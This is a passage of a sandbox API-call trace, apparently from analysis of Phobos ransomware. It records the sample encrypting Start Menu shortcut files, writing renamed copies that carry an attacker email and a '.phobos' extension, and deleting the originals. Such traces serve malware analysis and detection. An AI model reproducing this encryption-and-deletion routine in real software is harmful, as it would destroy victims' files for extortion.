[0176.985] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.985] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.985] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Print Management.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\print management.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.985] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ba8) returned 1 [0176.985] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.985] ReadFile (in: hFile=0x148, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4ee, lpOverlapped=0x0) returned 1 [0177.000] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4f0, dwBufLen=0x4f0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4f0) returned 1 [0177.000] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4f0, lpOverlapped=0x0) returned 1 [0177.001] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d68) returned 1 [0177.001] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.001] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0177.001] CryptDestroyKey (hKey=0xa32d68) returned 1 [0177.001] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0177.002] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.002] CloseHandle (hObject=0x148) returned 1 [0177.002] CloseHandle (hObject=0x17c) returned 1 [0177.002] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Print Management.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\print management.lnk")) returned 1 [0177.003] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0177.003] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\services.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\services.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0177.004] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1288) returned 1 [0177.004] CloseHandle (hObject=0x17c) returned 1 [0177.004] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\services.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\services.lnk")) returned 0x20 [0177.004] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\services.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\services.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.004] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\services.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\services.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0177.004] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.004] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.004] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\services.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\services.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0177.005] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ba8) returned 1 [0177.005] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.005] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x508, lpOverlapped=0x0) returned 1 [0177.014] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x510, dwBufLen=0x510 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x510) returned 1 [0177.014] WriteFile (in: hFile=0x148, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x510, lpOverlapped=0x0) returned 1 [0177.015] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d68) returned 1 [0177.015] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.015] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0177.015] CryptDestroyKey (hKey=0xa32d68) returned 1 [0177.015] WriteFile (in: hFile=0x148, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0177.015] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.015] CloseHandle (hObject=0x17c) returned 1 [0177.015] CloseHandle (hObject=0x148) returned 1 [0177.015] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\services.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\services.lnk")) returned 1 [0177.017] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0177.017] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Task Scheduler.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\task scheduler.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0177.017] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1262) returned 1 [0177.017] CloseHandle (hObject=0x148) returned 1 [0177.017] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Task Scheduler.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\task scheduler.lnk")) returned 0x20 [0177.017] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Task Scheduler.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\task scheduler.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.017] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Task Scheduler.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\task scheduler.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0177.017] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.018] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.018] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Task Scheduler.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\task scheduler.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0177.018] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ba8) returned 1 [0177.018] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.018] ReadFile (in: hFile=0x148, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4ee, lpOverlapped=0x0) returned 1 [0177.048] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4f0, dwBufLen=0x4f0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4f0) returned 1 [0177.048] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4f0, lpOverlapped=0x0) returned 1 [0177.049] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d68) returned 1 [0177.049] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.049] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0177.049] CryptDestroyKey (hKey=0xa32d68) returned 1 [0177.049] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0177.049] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.049] CloseHandle (hObject=0x148) returned 1 [0177.049] CloseHandle (hObject=0x17c) returned 1 [0177.049] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Task Scheduler.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\task scheduler.lnk")) returned 1 [0177.051] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0177.051] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows PowerShell Modules.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\windows powershell modules.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0177.051] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2741) returned 1 [0177.051] CloseHandle (hObject=0x17c) returned 1 [0177.051] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows PowerShell Modules.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\windows powershell modules.lnk")) returned 0x20 [0177.051] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows PowerShell Modules.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\windows powershell modules.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.051] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows PowerShell Modules.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\windows powershell modules.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0177.051] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.052] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.052] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows PowerShell Modules.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\windows powershell modules.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0177.052] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ba8) returned 1 [0177.052] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.052] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xab5, lpOverlapped=0x0) returned 1 [0177.065] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xac0, dwBufLen=0xac0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xac0) returned 1 [0177.065] WriteFile (in: hFile=0x148, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xac0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xac0, lpOverlapped=0x0) returned 1 [0177.066] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d68) returned 1 [0177.066] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.066] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0177.066] CryptDestroyKey (hKey=0xa32d68) returned 1 [0177.066] WriteFile (in: hFile=0x148, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0177.066] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.066] CloseHandle (hObject=0x17c) returned 1 [0177.066] CloseHandle (hObject=0x148) returned 1 [0177.066] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows PowerShell Modules.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\windows powershell modules.lnk")) returned 1 [0177.074] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0177.074] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\GameExplorer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\games\\gameexplorer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.074] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=258) returned 1 [0177.074] CloseHandle (hObject=0x180) returned 1 [0177.074] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\GameExplorer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\games\\gameexplorer.lnk")) returned 0x20 [0177.074] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\GameExplorer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\games\\gameexplorer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.074] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\GameExplorer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\games\\gameexplorer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.075] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.075] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.075] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\GameExplorer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\games\\gameexplorer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.083] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32968) returned 1 [0177.083] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.083] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x102, lpOverlapped=0x0) returned 1 [0177.084] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x110, dwBufLen=0x110 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x110) returned 1 [0177.084] WriteFile (in: hFile=0x190, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x110, lpOverlapped=0x0) returned 1 [0177.085] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ca8) returned 1 [0177.085] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.085] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0177.085] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0177.085] WriteFile (in: hFile=0x190, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0177.085] CryptDestroyKey (hKey=0xa32968) returned 1 [0177.085] CloseHandle (hObject=0x180) returned 1 [0177.085] CloseHandle (hObject=0x190) returned 1 [0177.085] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\GameExplorer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\games\\gameexplorer.lnk")) returned 1 [0177.087] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0177.087] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\About Java.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\about java.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.088] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1999) returned 1 [0177.088] CloseHandle (hObject=0x190) returned 1 [0177.088] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\About Java.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\about java.lnk")) returned 0x20 [0177.088] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\About Java.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\about java.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.088] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\About Java.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\about java.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.088] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.088] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.089] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\About Java.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\about java.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.089] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32968) returned 1 [0177.089] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.089] ReadFile (in: hFile=0x190, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x7cf, lpOverlapped=0x0) returned 1 [0177.096] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x7d0, dwBufLen=0x7d0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x7d0) returned 1 [0177.096] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x7d0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x7d0, lpOverlapped=0x0) returned 1 [0177.097] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: 